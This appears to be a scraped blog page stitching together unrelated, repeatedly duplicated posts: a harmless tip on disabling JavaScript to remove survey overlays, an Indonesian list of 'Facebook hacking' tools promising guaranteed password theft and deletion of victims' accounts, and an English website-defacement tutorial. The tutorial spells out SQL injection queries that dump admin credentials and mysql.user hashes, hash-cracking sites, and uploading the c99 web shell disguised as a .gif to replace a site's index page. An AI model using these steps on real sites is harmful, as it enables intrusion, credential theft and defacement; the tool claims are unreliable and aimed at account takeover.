  • Klik Tools
  • Klik Options
  • Pilih Content
  • Buang ceklist Enable JavaScript
  • OK
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

catatan : setelah halaman selesai digunakan, kembalikan lagi pengaturan seperti awal / semula agar site - site yang menggunakan javascript tidak ada masalah !
Semoga Bermanfaat !!!

Bagaimana cara mendownload file yang pada halaman tersebut terdapat survey atau tampilan yang menutupi link download yang ada ?
Poling survey sebenarnya digunakan untuk mengetahui tanggapan dari pengunjung terhadap polling yang ditanyakan. Namun, polling seperti ini dirasa mengganggu ! Saya contohkan survey yang dimaksud :

Halaman yang meminta polling survey
Pada gambar di atas, sebelum bisa mendownload mau tidak mau kita harus mengikuti instruksi yang diminta oleh survey. Itulah mengapa saya katakan tampilan seperti ini mengganggu !
Pada postingan kali ini, saya akan share bagaimana cara mengatasi halaman download yang ada polling survey nya. Silahkan disimak :
Untuk Google Chrome :
  • Klik Customize and control Google Chrome (Gambar Kunci Pas di pojok kanan atas)
  • Klik Option
  • Pilih Under The Hood
  • Pada Privacy , pilih Content Settings..
  • Pada JavaScript , Ceklist Do Not Allow Any Site to Run JavaScript
  • atau untuk memanage beberapa site saja , silahkan gunakan Manage Exceptions
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

Untuk Mozilla Firefox :
  • Klik Tools
  • Klik Options
  • Pilih Content
  • Buang ceklist Enable JavaScript
  • OK
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

catatan : setelah halaman selesai digunakan, kembalikan lagi pengaturan seperti awal / semula agar site - site yang menggunakan javascript tidak ada masalah !
Semoga Bermanfaat !!!

Bagaimana cara mendownload file yang pada halaman tersebut terdapat survey atau tampilan yang menutupi link download yang ada ?
Poling survey sebenarnya digunakan untuk mengetahui tanggapan dari pengunjung terhadap polling yang ditanyakan. Namun, polling seperti ini dirasa mengganggu ! Saya contohkan survey yang dimaksud :

Halaman yang meminta polling survey
Pada gambar di atas, sebelum bisa mendownload mau tidak mau kita harus mengikuti instruksi yang diminta oleh survey. Itulah mengapa saya katakan tampilan seperti ini mengganggu !
Pada postingan kali ini, saya akan share bagaimana cara mengatasi halaman download yang ada polling survey nya. Silahkan disimak :
Untuk Google Chrome :
  • Klik Customize and control Google Chrome (Gambar Kunci Pas di pojok kanan atas)
  • Klik Option
  • Pilih Under The Hood
  • Pada Privacy , pilih Content Settings..
  • Pada JavaScript , Ceklist Do Not Allow Any Site to Run JavaScript
  • atau untuk memanage beberapa site saja , silahkan gunakan Manage Exceptions
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

Untuk Mozilla Firefox :
  • Klik Tools
  • Klik Options
  • Pilih Content
  • Buang ceklist Enable JavaScript
  • OK
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

catatan : setelah halaman selesai digunakan, kembalikan lagi pengaturan seperti awal / semula agar site - site yang menggunakan javascript tidak ada masalah !
Semoga Bermanfaat !!!

Bagaimana cara mendownload file yang pada halaman tersebut terdapat survey atau tampilan yang menutupi link download yang ada ?
Poling survey sebenarnya digunakan untuk mengetahui tanggapan dari pengunjung terhadap polling yang ditanyakan. Namun, polling seperti ini dirasa mengganggu ! Saya contohkan survey yang dimaksud :

Halaman yang meminta polling survey
Pada gambar di atas, sebelum bisa mendownload mau tidak mau kita harus mengikuti instruksi yang diminta oleh survey. Itulah mengapa saya katakan tampilan seperti ini mengganggu !
Pada postingan kali ini, saya akan share bagaimana cara mengatasi halaman download yang ada polling survey nya. Silahkan disimak :
Untuk Google Chrome :
  • Klik Customize and control Google Chrome (Gambar Kunci Pas di pojok kanan atas)
  • Klik Option
  • Pilih Under The Hood
  • Pada Privacy , pilih Content Settings..
  • Pada JavaScript , Ceklist Do Not Allow Any Site to Run JavaScript
  • atau untuk memanage beberapa site saja , silahkan gunakan Manage Exceptions
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

Untuk Mozilla Firefox :
  • Klik Tools
  • Klik Options
  • Pilih Content
  • Buang ceklist Enable JavaScript
  • OK
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

catatan : setelah halaman selesai digunakan, kembalikan lagi pengaturan seperti awal / semula agar site - site yang menggunakan javascript tidak ada masalah !
Semoga Bermanfaat !!!

Bagaimana cara mendownload file yang pada halaman tersebut terdapat survey atau tampilan yang menutupi link download yang ada ?
Poling survey sebenarnya digunakan untuk mengetahui tanggapan dari pengunjung terhadap polling yang ditanyakan. Namun, polling seperti ini dirasa mengganggu ! Saya contohkan survey yang dimaksud :

Halaman yang meminta polling survey
Pada gambar di atas, sebelum bisa mendownload mau tidak mau kita harus mengikuti instruksi yang diminta oleh survey. Itulah mengapa saya katakan tampilan seperti ini mengganggu !
Pada postingan kali ini, saya akan share bagaimana cara mengatasi halaman download yang ada polling survey nya. Silahkan disimak :
Untuk Google Chrome :
  • Klik Customize and control Google Chrome (Gambar Kunci Pas di pojok kanan atas)
  • Klik Option
  • Pilih Under The Hood
  • Pada Privacy , pilih Content Settings..
  • Pada JavaScript , Ceklist Do Not Allow Any Site to Run JavaScript
  • atau untuk memanage beberapa site saja , silahkan gunakan Manage Exceptions
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

Untuk Mozilla Firefox :
  • Klik Tools
  • Klik Options
  • Pilih Content
  • Buang ceklist Enable JavaScript
  • OK
  • Kemudian Refresh Halaman
  • Maka Polling Survey akan hilang !

catatan : setelah halaman selesai digunakan, kembalikan lagi pengaturan seperti awal / semula agar site - site yang menggunakan javascript tidak ada masalah !
Semoga Bermanfaat !!!

Rabu, 11 September 2013

Cara Hack Facebook Dengan Tools Hacking Facebook 2013



Jaman sekarang siapa sih yang tidak kenal dengan Facebook, jejaring sosial yang paling tenar sekarang ini. Di balik bermain facebook ada pula manfaat baik dan buruknya, memang semua pasti ada dampak buruknya kalo berlebihan. Nah, kali ini saya share Cara Hack Facebook Dengan Tools Hacking Facebook. Tapi jangan digunakan buat sembarangan, penggunaannya bisa dilakukan pada saat-saat genting aja...wkwkwk. Terserah deh pokoknya digunakan untuk hal yang baik dan benar jika anda memakainya untuk yang tidak benar, maka admin tidak bertanggung jawab untuk itu.

Berikut Link Download Aplikasi Hacking Facebook
  •  Pirate Hack Facebook Versi Modifikasi

Pirate hack ini sudah di modifikasi sehingga tidak memerlukan IP address lagi, beda sama yang biasa lebih mudah, 100% berhasil

  • Hack Facebook 2012

Baru…. sangat sederhana dan mudah di ikuti, 100% berhasil di jamin

  • Facebook Password Detector v.52

Software Baru keluaran Miscolinuo.Inc ini mampu mendeteksi password facebook hanya dengan memasukkan email address, jadi kalau tidak tahu alamat email kamu nggak bisa gunakan software ini, 99% berhasil


  • Facebook Remover. v.01

Tool terbaru yang di buat oleh saingan besar facebook, untuk mengurangi pengguna facebook, jika kamu Mau meng- deactivate account facebook orang. silahkan pake software ini, dijamin facebook korban akan hilang dari dunia perfacebookan alias hilang selamanya, seperti anda mendeactivate di account setting, tinggal masukkan id facebook, 1000000 persen berhasil.

HACK FACEBOOK 2013
CARA HACK FACEBOOK 2013
HACKTOOLS FACEBOOK 2013
HACK FACEBOOK TERBARU
CARA HACK FACEBOOK TERBARU
SOFTWARE HACK FACEBOOK 2013
SOFTWARE HACK FACEBOOK TERBARU
FACEBOOK HACK
CARA HACKING FACEBOOK
CARA MENGETAHUI PASSWORD FACEBOOK 2013
HACKING FACEBOOK 2013
CHEAT FACEBOOK



Jaman sekarang siapa sih yang tidak kenal dengan Facebook, jejaring sosial yang paling tenar sekarang ini. Di balik bermain facebook ada pula manfaat baik dan buruknya, memang semua pasti ada dampak buruknya kalo berlebihan. Nah, kali ini saya share Cara Hack Facebook Dengan Tools Hacking Facebook. Tapi jangan digunakan buat sembarangan, penggunaannya bisa dilakukan pada saat-saat genting aja...wkwkwk. Terserah deh pokoknya digunakan untuk hal yang baik dan benar jika anda memakainya untuk yang tidak benar, maka admin tidak bertanggung jawab untuk itu.

Berikut Link Download Aplikasi Hacking Facebook
  •  Pirate Hack Facebook Versi Modifikasi

Pirate hack ini sudah di modifikasi sehingga tidak memerlukan IP address lagi, beda sama yang biasa lebih mudah, 100% berhasil

  • Hack Facebook 2012

Baru…. sangat sederhana dan mudah di ikuti, 100% berhasil di jamin

  • Facebook Password Detector v.52

Software Baru keluaran Miscolinuo.Inc ini mampu mendeteksi password facebook hanya dengan memasukkan email address, jadi kalau tidak tahu alamat email kamu nggak bisa gunakan software ini, 99% berhasil


  • Facebook Remover. v.01

Tool terbaru yang di buat oleh saingan besar facebook, untuk mengurangi pengguna facebook, jika kamu Mau meng- deactivate account facebook orang. silahkan pake software ini, dijamin facebook korban akan hilang dari dunia perfacebookan alias hilang selamanya, seperti anda mendeactivate di account setting, tinggal masukkan id facebook, 1000000 persen berhasil.

HACK FACEBOOK 2013
CARA HACK FACEBOOK 2013
HACKTOOLS FACEBOOK 2013
HACK FACEBOOK TERBARU
CARA HACK FACEBOOK TERBARU
SOFTWARE HACK FACEBOOK 2013
SOFTWARE HACK FACEBOOK TERBARU
FACEBOOK HACK
CARA HACKING FACEBOOK
CARA MENGETAHUI PASSWORD FACEBOOK 2013
HACKING FACEBOOK 2013
CHEAT FACEBOOK



Jaman sekarang siapa sih yang tidak kenal dengan Facebook, jejaring sosial yang paling tenar sekarang ini. Di balik bermain facebook ada pula manfaat baik dan buruknya, memang semua pasti ada dampak buruknya kalo berlebihan. Nah, kali ini saya share Cara Hack Facebook Dengan Tools Hacking Facebook. Tapi jangan digunakan buat sembarangan, penggunaannya bisa dilakukan pada saat-saat genting aja...wkwkwk. Terserah deh pokoknya digunakan untuk hal yang baik dan benar jika anda memakainya untuk yang tidak benar, maka admin tidak bertanggung jawab untuk itu.

Berikut Link Download Aplikasi Hacking Facebook
  •  Pirate Hack Facebook Versi Modifikasi

Pirate hack ini sudah di modifikasi sehingga tidak memerlukan IP address lagi, beda sama yang biasa lebih mudah, 100% berhasil

  • Hack Facebook 2012

Baru…. sangat sederhana dan mudah di ikuti, 100% berhasil di jamin

  • Facebook Password Detector v.52

Software Baru keluaran Miscolinuo.Inc ini mampu mendeteksi password facebook hanya dengan memasukkan email address, jadi kalau tidak tahu alamat email kamu nggak bisa gunakan software ini, 99% berhasil


  • Facebook Remover. v.01

Tool terbaru yang di buat oleh saingan besar facebook, untuk mengurangi pengguna facebook, jika kamu Mau meng- deactivate account facebook orang. silahkan pake software ini, dijamin facebook korban akan hilang dari dunia perfacebookan alias hilang selamanya, seperti anda mendeactivate di account setting, tinggal masukkan id facebook, 1000000 persen berhasil.

HACK FACEBOOK 2013
CARA HACK FACEBOOK 2013
HACKTOOLS FACEBOOK 2013
HACK FACEBOOK TERBARU
CARA HACK FACEBOOK TERBARU
SOFTWARE HACK FACEBOOK 2013
SOFTWARE HACK FACEBOOK TERBARU
FACEBOOK HACK
CARA HACKING FACEBOOK
CARA MENGETAHUI PASSWORD FACEBOOK 2013
HACKING FACEBOOK 2013
CHEAT FACEBOOK



Jaman sekarang siapa sih yang tidak kenal dengan Facebook, jejaring sosial yang paling tenar sekarang ini. Di balik bermain facebook ada pula manfaat baik dan buruknya, memang semua pasti ada dampak buruknya kalo berlebihan. Nah, kali ini saya share Cara Hack Facebook Dengan Tools Hacking Facebook. Tapi jangan digunakan buat sembarangan, penggunaannya bisa dilakukan pada saat-saat genting aja...wkwkwk. Terserah deh pokoknya digunakan untuk hal yang baik dan benar jika anda memakainya untuk yang tidak benar, maka admin tidak bertanggung jawab untuk itu.

Berikut Link Download Aplikasi Hacking Facebook
  •  Pirate Hack Facebook Versi Modifikasi

Pirate hack ini sudah di modifikasi sehingga tidak memerlukan IP address lagi, beda sama yang biasa lebih mudah, 100% berhasil

  • Hack Facebook 2012

Baru…. sangat sederhana dan mudah di ikuti, 100% berhasil di jamin

  • Facebook Password Detector v.52

Software Baru keluaran Miscolinuo.Inc ini mampu mendeteksi password facebook hanya dengan memasukkan email address, jadi kalau tidak tahu alamat email kamu nggak bisa gunakan software ini, 99% berhasil


  • Facebook Remover. v.01

Tool terbaru yang di buat oleh saingan besar facebook, untuk mengurangi pengguna facebook, jika kamu Mau meng- deactivate account facebook orang. silahkan pake software ini, dijamin facebook korban akan hilang dari dunia perfacebookan alias hilang selamanya, seperti anda mendeactivate di account setting, tinggal masukkan id facebook, 1000000 persen berhasil.

HACK FACEBOOK 2013
CARA HACK FACEBOOK 2013
HACKTOOLS FACEBOOK 2013
HACK FACEBOOK TERBARU
CARA HACK FACEBOOK TERBARU
SOFTWARE HACK FACEBOOK 2013
SOFTWARE HACK FACEBOOK TERBARU
FACEBOOK HACK
CARA HACKING FACEBOOK
CARA MENGETAHUI PASSWORD FACEBOOK 2013
HACKING FACEBOOK 2013
CHEAT FACEBOOK



Jaman sekarang siapa sih yang tidak kenal dengan Facebook, jejaring sosial yang paling tenar sekarang ini. Di balik bermain facebook ada pula manfaat baik dan buruknya, memang semua pasti ada dampak buruknya kalo berlebihan. Nah, kali ini saya share Cara Hack Facebook Dengan Tools Hacking Facebook. Tapi jangan digunakan buat sembarangan, penggunaannya bisa dilakukan pada saat-saat genting aja...wkwkwk. Terserah deh pokoknya digunakan untuk hal yang baik dan benar jika anda memakainya untuk yang tidak benar, maka admin tidak bertanggung jawab untuk itu.

Berikut Link Download Aplikasi Hacking Facebook
  •  Pirate Hack Facebook Versi Modifikasi

Pirate hack ini sudah di modifikasi sehingga tidak memerlukan IP address lagi, beda sama yang biasa lebih mudah, 100% berhasil

  • Hack Facebook 2012

Baru…. sangat sederhana dan mudah di ikuti, 100% berhasil di jamin

  • Facebook Password Detector v.52

Software Baru keluaran Miscolinuo.Inc ini mampu mendeteksi password facebook hanya dengan memasukkan email address, jadi kalau tidak tahu alamat email kamu nggak bisa gunakan software ini, 99% berhasil


  • Facebook Remover. v.01

Tool terbaru yang di buat oleh saingan besar facebook, untuk mengurangi pengguna facebook, jika kamu Mau meng- deactivate account facebook orang. silahkan pake software ini, dijamin facebook korban akan hilang dari dunia perfacebookan alias hilang selamanya, seperti anda mendeactivate di account setting, tinggal masukkan id facebook, 1000000 persen berhasil.

HACK FACEBOOK 2013
CARA HACK FACEBOOK 2013
HACKTOOLS FACEBOOK 2013
HACK FACEBOOK TERBARU
CARA HACK FACEBOOK TERBARU
SOFTWARE HACK FACEBOOK 2013
SOFTWARE HACK FACEBOOK TERBARU
FACEBOOK HACK
CARA HACKING FACEBOOK
CARA MENGETAHUI PASSWORD FACEBOOK 2013
HACKING FACEBOOK 2013
CHEAT FACEBOOK

How to deface a website Turtorial

Defacing a website simply means that we replace the index.html file of a site by our file. 
Now all the Users that open it will see our Page(i.e being uploaded by us).
First of all u should have the knowledge of :- 

1. SQL Injection(For analyzing website loops)
2. Admin Password

3. Shell Script (for getting Admin Controls)
Now, lets come on main topic,our first work is finding the target website.After it:-
1>> Test the vulnerability of the websites.  
 
for example,we have a site like this

http://www.xyz.com/news.php?id=5

Now to test if is vulnerable we add to the end of url ' (quote),and that would be
 
http://www.xyz.com/news.php?id=5'

so if we get some error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

or something similar that means the Site is vulnerable to SQL injection.



2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

http://www.xyz.com/news.php?id=5
 order by 1/* <-- no error

http://www.xyz.com/news.php?id=5 order by 2/* <-- no error

http://www.xyz.com/news.php?id=5 order by 3/* <-- no error

http://www.xyz.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.



3). Check for UNION function

With union we can select more data in one sql statement.
So we have

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .


4). Check for MySQL version

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:-
 
http://www.xyz.com/news.php?id=5 union all select 1,@@version,3/*
 
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so i must write it .

What we need is convert() function
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .


5). Getting table and column name

Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be

http://www.xyz.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )
We know that table admin exists...
Now to check column names.

http://www.xyz.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists

http://www.xyz.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up 

i.e md5 hash, mysql hash, sha1...
Now we must complete query to look nice

For that we can use concat() function (it joins strings)
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )


http://www.xyz.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get dislayed username:p
assword on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.

If can't guess the right table name, you can always try mysql.user (default)
It has user  password columns, so example would be

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1.
now to view the second table, we change limit 0,1 to limit 1,1
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.
for third table we put limit 2,1

i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.
The second one (we change limit 0,1 to limit 1,1)
ie.

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... 


If you wanna display column names for specific table use this query. (where clause)
Let's say that we found table users.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
Let's say that we found colums user, pass and email.
Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/


What we get here is user:p
ass:email from table users.

Example: admin:hash:whatever@gmail.com

** If you are too lazy for doing above stuff you can use tools they will do all the job:


1) Exploit scanner (this will find vulnerable websites)
Code:
http://rapidshare.com/files/24802790...oitscanner.zip


2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/24802907...elperV.2.7.rar


*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. 



To crack the password there are three ways:-

1) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk


2) Crack the password with the help of a site:
Download::
http://www.milw0rm.com/cracker/insert.php


http://passcracking.com/index.php


3) Use a MD5 cracking software:
Download:
http://rapidshare.com/files/13696796...CF_2.10_2b.rar


Password = OwlsNest


2) DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.


1) You can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/


2) You can use an admin finder software:


Code:
http://rapidshare.com/files/248020485/adminfinder.rar



After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Dowload the shell here:
http://rapidshare.com/files/248023722/c99.rar


Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to 
http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)


find the c99.php.gif and click it..


Now you can see a big control pannel....
Now you can do what ever you want to do...
Search for the index.html file and replace it with your own file. 

So if any one goes to that site they will see your page....

After Doing This click on Logout and You are Done..


 Enjoy;:))

Defacing a website simply means that we replace the index.html file of a site by our file. 
Now all the Users that open it will see our Page(i.e being uploaded by us).
First of all u should have the knowledge of :- 

1. SQL Injection(For analyzing website loops)
2. Admin Password

3. Shell Script (for getting Admin Controls)
Now, lets come on main topic,our first work is finding the target website.After it:-
1>> Test the vulnerability of the websites.  
 
for example,we have a site like this

http://www.xyz.com/news.php?id=5

Now to test if is vulnerable we add to the end of url ' (quote),and that would be
 
http://www.xyz.com/news.php?id=5'

so if we get some error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

or something similar that means the Site is vulnerable to SQL injection.



2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

http://www.xyz.com/news.php?id=5
 order by 1/* <-- no error

http://www.xyz.com/news.php?id=5 order by 2/* <-- no error

http://www.xyz.com/news.php?id=5 order by 3/* <-- no error

http://www.xyz.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.



3). Check for UNION function

With union we can select more data in one sql statement.
So we have

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .


4). Check for MySQL version

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:-
 
http://www.xyz.com/news.php?id=5 union all select 1,@@version,3/*
 
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so i must write it .

What we need is convert() function
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .


5). Getting table and column name

Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be

http://www.xyz.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )
We know that table admin exists...
Now to check column names.

http://www.xyz.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists

http://www.xyz.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up 

i.e md5 hash, mysql hash, sha1...
Now we must complete query to look nice

For that we can use concat() function (it joins strings)
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )


http://www.xyz.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get dislayed username:p
assword on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.

If can't guess the right table name, you can always try mysql.user (default)
It has user  password columns, so example would be

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1.
now to view the second table, we change limit 0,1 to limit 1,1
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.
for third table we put limit 2,1

i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.
The second one (we change limit 0,1 to limit 1,1)
ie.

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... 


If you wanna display column names for specific table use this query. (where clause)
Let's say that we found table users.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
Let's say that we found colums user, pass and email.
Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/


What we get here is user:p
ass:email from table users.

Example: admin:hash:whatever@gmail.com

** If you are too lazy for doing above stuff you can use tools they will do all the job:


1) Exploit scanner (this will find vulnerable websites)
Code:
http://rapidshare.com/files/24802790...oitscanner.zip


2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/24802907...elperV.2.7.rar


*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. 



To crack the password there are three ways:-

1) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk


2) Crack the password with the help of a site:
Download::
http://www.milw0rm.com/cracker/insert.php


http://passcracking.com/index.php


3) Use a MD5 cracking software:
Download:
http://rapidshare.com/files/13696796...CF_2.10_2b.rar


Password = OwlsNest


2) DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.


1) You can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/


2) You can use an admin finder software:


Code:
http://rapidshare.com/files/248020485/adminfinder.rar



After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Dowload the shell here:
http://rapidshare.com/files/248023722/c99.rar


Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to 
http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)


find the c99.php.gif and click it..


Now you can see a big control pannel....
Now you can do what ever you want to do...
Search for the index.html file and replace it with your own file. 

So if any one goes to that site they will see your page....

After Doing This click on Logout and You are Done..


 Enjoy;:))

Defacing a website simply means that we replace the index.html file of a site by our file. 
Now all the Users that open it will see our Page(i.e being uploaded by us).
First of all u should have the knowledge of :- 

1. SQL Injection(For analyzing website loops)
2. Admin Password

3. Shell Script (for getting Admin Controls)
Now, lets come on main topic,our first work is finding the target website.After it:-
1>> Test the vulnerability of the websites.  
 
for example,we have a site like this

http://www.xyz.com/news.php?id=5

Now to test if is vulnerable we add to the end of url ' (quote),and that would be
 
http://www.xyz.com/news.php?id=5'

so if we get some error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

or something similar that means the Site is vulnerable to SQL injection.



2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

http://www.xyz.com/news.php?id=5
 order by 1/* <-- no error

http://www.xyz.com/news.php?id=5 order by 2/* <-- no error

http://www.xyz.com/news.php?id=5 order by 3/* <-- no error

http://www.xyz.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.



3). Check for UNION function

With union we can select more data in one sql statement.
So we have

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .


4). Check for MySQL version

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:-
 
